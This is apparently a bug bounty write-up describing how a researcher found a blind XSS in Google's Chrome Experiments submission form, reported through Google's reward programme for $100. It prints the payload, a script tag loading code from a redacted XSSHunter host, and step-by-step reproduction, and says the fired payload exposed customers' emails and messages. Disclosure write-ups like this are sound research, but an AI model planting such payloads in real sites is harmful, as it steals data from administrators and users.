In this article, I will show you how I found a blind-XSS vulnerability that leads into Information Disclosure in one of Google's owned product which is the Chrome Experiments (https://experiments.withgoogle.com/chrome)
Back in June last year while looking for Google bug bounty related write up, I found a video proof of concept on youtube about a Cross Site Scripting vulnerability on one of the Google owned product, the Chrome Experiments (https://chromeexperiments.com). on the description of his video PoC, he didn't mention if the bug was awarded or not so I decided to hunt on the same domain. I fired up my sublist3r just to check if there's any interesting subdomains and found an interesting one which is http://workshop.chromeexperiments.com/. On the subdomain, I found a Cross Site Scripting vulnerability and reported it to the Google VRP which ends up getting duplicate.
| XSS in http://workshop.chromeexperiments.com [Duplicate] |
So long story short, I found a blind-XSS on https://experiments.withgoogle.com/ which is also related to http://workshop.chromeexperiments.com/. on the new target, I found an interesting page which is https://experiments.withgoogle.com/submit. On my first test, I tried to look up for some XSS and nothing was found. after a few minutes of testing, I decided to fire up my XSSHunter account to test for a blind-XSS, on the new target page, I fill up the form with some blind-XSS payload and submitted it to the server but I didn't receive any successful email about my payload 'til the next few weeks since I submitted. but fortunately, On the 30th of August, few months later after I submitted my payload. I received an email from XSSHunter saying that one of my payload fired up!
But at first place, the XSSHunter email is very confusing since it didn't even give me any hint where it came from but after a few hours of investigation, I found a hint on the param "DOM" on XSSHunter logs. I noticed that XSSHunter throws some interesting information from the Chrome Experiments. Hundreds of personal emails and private messages from the customers and I also found my test submission on the logs, that's where I remember what target page I submitted my blind-XSS payload.
So below is the Proof of Concept I submitted to Google Security Team.
Report details:
ID: 5-64xxxxxxxxxxx
Reporter: [email protected]
1. Goto https://xsshunter.com/app and register
2. Goto https://experiments.withgoogle.com/submit
3. In the "Submit your experiment" form, input your blind XSS payload. my payload was ("><script src=https://<redacted>.xss.ht></script>)
4. Click Submit.
If the admin of https://experiments.withgoogle.com/ will open the admin panel to check the submissions, the blind XSS payload will fire on and you will received an email from XSSHunter that your payload fired on https://experiments.withgoogle.com/.
Attack scenario:
This issue is not just blind-XSS. in the logs that was emailed to me from XSSHunter, it leaks some hundreds of different email addresses from the Chrome Experiments customers who submitted to them.
Check this link for the logs that was emailed to me from XSSHunter about the Chrome Experiments: http://<redacted>/chromeexperimentspoc.html
In the logs, there some email address leak from the Chrome Experiments customers which results to Information Disclosure.
PS: it took me a months before I received an email from XSSHunter that my payload from Chrome Experiments fired on their side, because maybe the admin from Chrome Experiments logged in to the admin panel of the chrome experiments the other day and opens the submission page.
I hope you understand
Cheers,
Evan
--Timeline--
Reported: Friday, September 1, 2017 at 1:27 AM
Triaged: Friday, September 1, 2017 at 6:52 PM
Nice Catch: Monday, September 4, 2017 at 9:04 PM
Awarded: Thursday, September 7, 2017 at 1:17 AM ($100)
Fixed: ----
Shoutout to @IAmMandatory for the awesome XSSHunter tool.
I hope you enjoy this short story and write up.
"The biggest adventure you can take is to live the life of your dreams"
~Oprah Winfrey